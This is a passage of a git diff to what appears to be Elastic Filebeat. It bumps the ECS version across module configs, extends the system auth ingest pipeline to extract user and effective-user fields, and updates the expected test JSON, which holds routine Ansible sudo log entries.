fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/haproxy/log/config/syslog.yml b/filebeat/module/haproxy/log/config/syslog.yml index fcad82506aa4..cf755c53a968 100644 --- a/filebeat/module/haproxy/log/config/syslog.yml +++ b/filebeat/module/haproxy/log/config/syslog.yml @@ -6,4 +6,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/icinga/debug/config/debug.yml b/filebeat/module/icinga/debug/config/debug.yml index cbc9eb1477b0..34bdcef7fa88 100644 --- a/filebeat/module/icinga/debug/config/debug.yml +++ b/filebeat/module/icinga/debug/config/debug.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/icinga/main/config/main.yml b/filebeat/module/icinga/main/config/main.yml index cbc9eb1477b0..34bdcef7fa88 100644 --- a/filebeat/module/icinga/main/config/main.yml +++ b/filebeat/module/icinga/main/config/main.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/icinga/startup/config/startup.yml b/filebeat/module/icinga/startup/config/startup.yml index cd175ad6523a..81a45be7e91b 100644 --- a/filebeat/module/icinga/startup/config/startup.yml +++ b/filebeat/module/icinga/startup/config/startup.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/iis/access/config/iis-access.yml b/filebeat/module/iis/access/config/iis-access.yml index 0ca1a0c54377..aadbabb01ede 100644 --- a/filebeat/module/iis/access/config/iis-access.yml +++ b/filebeat/module/iis/access/config/iis-access.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/iis/error/config/iis-error.yml b/filebeat/module/iis/error/config/iis-error.yml index 0ca1a0c54377..aadbabb01ede 100644 --- a/filebeat/module/iis/error/config/iis-error.yml +++ b/filebeat/module/iis/error/config/iis-error.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/kafka/log/config/log.yml b/filebeat/module/kafka/log/config/log.yml index be425d89b1f5..87f38b44128d 100644 --- a/filebeat/module/kafka/log/config/log.yml +++ b/filebeat/module/kafka/log/config/log.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/kibana/log/config/log.yml b/filebeat/module/kibana/log/config/log.yml index bcf49873fb30..a1c113f53a8d 100644 --- a/filebeat/module/kibana/log/config/log.yml +++ b/filebeat/module/kibana/log/config/log.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/logstash/log/config/log.yml b/filebeat/module/logstash/log/config/log.yml index 8c094e3c6ad0..a90a5be8d96d 100644 --- a/filebeat/module/logstash/log/config/log.yml +++ b/filebeat/module/logstash/log/config/log.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/logstash/slowlog/config/slowlog.yml b/filebeat/module/logstash/slowlog/config/slowlog.yml index 8de436195b51..f391047702dc 100644 --- a/filebeat/module/logstash/slowlog/config/slowlog.yml +++ b/filebeat/module/logstash/slowlog/config/slowlog.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/mongodb/log/config/log.yml b/filebeat/module/mongodb/log/config/log.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/mongodb/log/config/log.yml +++ b/filebeat/module/mongodb/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/mysql/error/config/error.yml b/filebeat/module/mysql/error/config/error.yml index 513287f28f8b..2bf22a084ec8 100644 --- a/filebeat/module/mysql/error/config/error.yml +++ b/filebeat/module/mysql/error/config/error.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/mysql/slowlog/config/slowlog.yml b/filebeat/module/mysql/slowlog/config/slowlog.yml index 557a49be46fc..6b83b5227060 100644 --- a/filebeat/module/mysql/slowlog/config/slowlog.yml +++ b/filebeat/module/mysql/slowlog/config/slowlog.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/nats/log/config/log.yml b/filebeat/module/nats/log/config/log.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/nats/log/config/log.yml +++ b/filebeat/module/nats/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/nginx/access/config/nginx-access.yml b/filebeat/module/nginx/access/config/nginx-access.yml index cb319d01efe4..2bd2a117d1c7 100644 --- a/filebeat/module/nginx/access/config/nginx-access.yml +++ b/filebeat/module/nginx/access/config/nginx-access.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/nginx/error/config/nginx-error.yml b/filebeat/module/nginx/error/config/nginx-error.yml index 680f826ce4eb..bc547d46f369 100644 --- a/filebeat/module/nginx/error/config/nginx-error.yml +++ b/filebeat/module/nginx/error/config/nginx-error.yml @@ -14,4 +14,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml b/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml index cb319d01efe4..2bd2a117d1c7 100644 --- a/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml +++ b/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/osquery/result/config/result.yml b/filebeat/module/osquery/result/config/result.yml index 2dd7593f42df..cd17ae39bdf5 100644 --- a/filebeat/module/osquery/result/config/result.yml +++ b/filebeat/module/osquery/result/config/result.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/postgresql/log/config/log.yml b/filebeat/module/postgresql/log/config/log.yml index 9d11854bf577..c33a4ad8de4f 100644 --- a/filebeat/module/postgresql/log/config/log.yml +++ b/filebeat/module/postgresql/log/config/log.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/redis/log/config/log.yml b/filebeat/module/redis/log/config/log.yml index a24f976513f4..e9de5bfce494 100644 --- a/filebeat/module/redis/log/config/log.yml +++ b/filebeat/module/redis/log/config/log.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/santa/log/config/file.yml b/filebeat/module/santa/log/config/file.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/santa/log/config/file.yml +++ b/filebeat/module/santa/log/config/file.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/system/auth/config/auth.yml b/filebeat/module/system/auth/config/auth.yml index d1d5c5935061..429067177d11 100644 --- a/filebeat/module/system/auth/config/auth.yml +++ b/filebeat/module/system/auth/config/auth.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/system/auth/ingest/pipeline.yml b/filebeat/module/system/auth/ingest/pipeline.yml index 54ab0dbf8f5d..48d5ecb490db 100644 --- a/filebeat/module/system/auth/ingest/pipeline.yml +++ b/filebeat/module/system/auth/ingest/pipeline.yml @@ -36,6 +36,44 @@ processors: field: system.auth.message target_field: message ignore_missing: true + if: ctx?.system?.auth?.message != null && ctx?.system?.auth?.message != "" +- grok: + field: message + ignore_missing: true + ignore_failure: true + patterns: + - 'for user \"?%{DATA:_temp.foruser}\"? by \"?%{DATA:_temp.byuser}\"?(?:\(uid=%{NUMBER:_temp.byuid}\))?$' + - 'for user \"?%{DATA:_temp.foruser}\"?$' + - 'by user \"?%{DATA:_temp.byuser}\"?$' + if: ctx?.message != null && ctx?.message != "" +- rename: + field: _temp.byuser + target_field: user.name + ignore_missing: true + ignore_failure: true +- rename: + field: _temp.byuid + target_field: user.id + ignore_missing: true + ignore_failure: true +- rename: + field: _temp.foruser + target_field: user.name + ignore_missing: true + ignore_failure: true + if: ctx?.user?.name == null || ctx?.user?.name == "" +- rename: + field: _temp.foruser + target_field: user.effective.name + ignore_missing: true + ignore_failure: true + if: ctx?.user?.name != null +- convert: + field: system.auth.sudo.user + target_field: user.effective.name + type: string + ignore_failure: true + if: ctx?.system?.auth?.sudo?.user != null - set: field: source.ip value: '{{system.auth.ssh.dropped_ip}}' @@ -96,7 +134,7 @@ processors: source: >- if (ctx.system.auth.ssh.event == "Accepted") { ctx.event.type = ["authentication_success", "info"]; - ctx.event.category = ["authentication"]; + ctx.event.category = ["authentication","session"]; ctx.event.action = "ssh_login"; ctx.event.outcome = "success"; } else if (ctx.system.auth.ssh.event == "Invalid" || ctx.system.auth.ssh.event == "Failed") { @@ -137,16 +175,23 @@ processors: - append: field: related.user value: "{{user.name}}" - if: "ctx?.user?.name != null" + allow_duplicates: false + if: "ctx?.user?.name != null && ctx.user?.name != ''" +- append: + field: related.user + value: "{{user.effective.name}}" + allow_duplicates: false + if: "ctx?.user?.effective?.name != null && ctx.user?.effective?.name != ''" - append: field: related.ip value: "{{source.ip}}" - if: "ctx?.source?.ip != null" + allow_duplicates: false + if: "ctx?.source?.ip != null && ctx.source?.ip != ''" - append: field: related.hosts value: "{{host.hostname}}" - if: "ctx.host?.hostname != null && ctx.host?.hostname != ''" allow_duplicates: false + if: "ctx.host?.hostname != null && ctx.host?.hostname != ''" on_failure: - set: field: error.message diff --git a/filebeat/module/system/auth/test/auth-ubuntu1204.log-expected.json b/filebeat/module/system/auth/test/auth-ubuntu1204.log-expected.json index cff887d76e88..52501ff2a7c2 100644 --- a/filebeat/module/system/auth/test/auth-ubuntu1204.log-expected.json +++ b/filebeat/module/system/auth/test/auth-ubuntu1204.log-expected.json @@ -14,7 +14,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -30,13 +34,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-lhspyyxxlfzpytwsebjoegenjxyjombo; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675177.72-26828938879074/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675177.72-26828938879074/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -53,7 +59,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -69,7 +82,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -86,7 +103,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -102,13 +123,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-xspkubktopzqiwiofvdhqaglconkrgwp; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675181.24-158548606882799/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675181.24-158548606882799/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -125,7 +148,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -141,7 +171,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -158,7 +192,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -174,13 +212,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-vxcrqvczsrjrrsjcokculalhrgfsxqzl; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675202.4-199750250589919/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675202.4-199750250589919/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -197,7 +237,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -213,7 +260,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -230,7 +281,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -246,13 +301,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-gruorqbeefuuhfprfoqzsftalatgwwvf; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675203.3-59927285912173/file; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675203.3-59927285912173/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -269,7 +326,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -285,7 +349,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -302,7 +370,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -318,13 +390,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-fnthqelgspkbnpnxlsknzcbyxbqqxpmt; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675204.07-135388534337396/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675204.07-135388534337396/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -341,7 +415,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -357,7 +438,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -374,7 +459,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -403,13 +492,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-wagdvfiuqxtryvmyrqlfcwoxeqqrxejt; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675206.28-198308747142204/async_wrapper 321853834469 45 /home/vagrant/.ansible/tmp/ansible-tmp-1486675206.28-198308747142204/command /home/vagrant/.ansible/tmp/ansible-tmp-1486675206.28-198308747142204/arguments; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675206.28-198308747142204/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -426,7 +517,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -442,7 +540,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -459,7 +561,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -475,13 +581,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-lkgydmrwiywdfvxfoxmgntufiumtzpmq; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675212.66-81790186240643/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675212.66-81790186240643/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -498,7 +606,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -514,7 +629,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -531,7 +650,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -547,13 +670,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-mjsapklbglujaoktlsyytirwygexdily; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675218.96-234174787135180/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675218.96-234174787135180/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -570,7 +695,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -586,7 +718,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -603,7 +739,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -619,13 +759,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-kvmafqtdnnvnyfyqlnoovickcavkqwdy; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675219.83-99205535237718/setup; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675219.83-99205535237718/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -642,7 +784,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -658,7 +807,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -675,7 +828,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -691,13 +848,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-nhrnwbdpypmsmvcstuihfqfbcvpxrmys; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675224.58-12467498973476/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675224.58-12467498973476/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -714,7 +873,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -730,7 +896,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -747,7 +917,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -763,13 +937,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-buzartmsbrirxgcoibjpsqjkldihhexh; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675228.25-195852789001210/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675228.25-195852789001210/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -786,7 +962,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -802,7 +985,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -819,7 +1006,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -835,13 +1026,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-swwkpvmnxhcuduxerfbgclhsmgbhwzie; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675247.78-128146395950020/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675247.78-128146395950020/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -858,7 +1051,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -874,7 +1074,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -891,7 +1095,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -907,13 +1115,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-raffykohamlcbnpxzipksbvfpjbfpagy; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675250.82-190689706060358/apt; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675250.82-190689706060358/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -930,7 +1140,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -946,7 +1163,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -963,7 +1184,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -979,13 +1204,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-dfoxiractbmtavfiwfnhzfkftipjumph; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675251.6-137767038423665/apt; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675251.6-137767038423665/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1002,7 +1229,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1018,7 +1252,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1035,7 +1273,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1051,13 +1293,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-jveaoynmhsmeodakzfhhaodihyroxobu; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675261.29-208287411335817/file; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675261.29-208287411335817/ >/dev/null 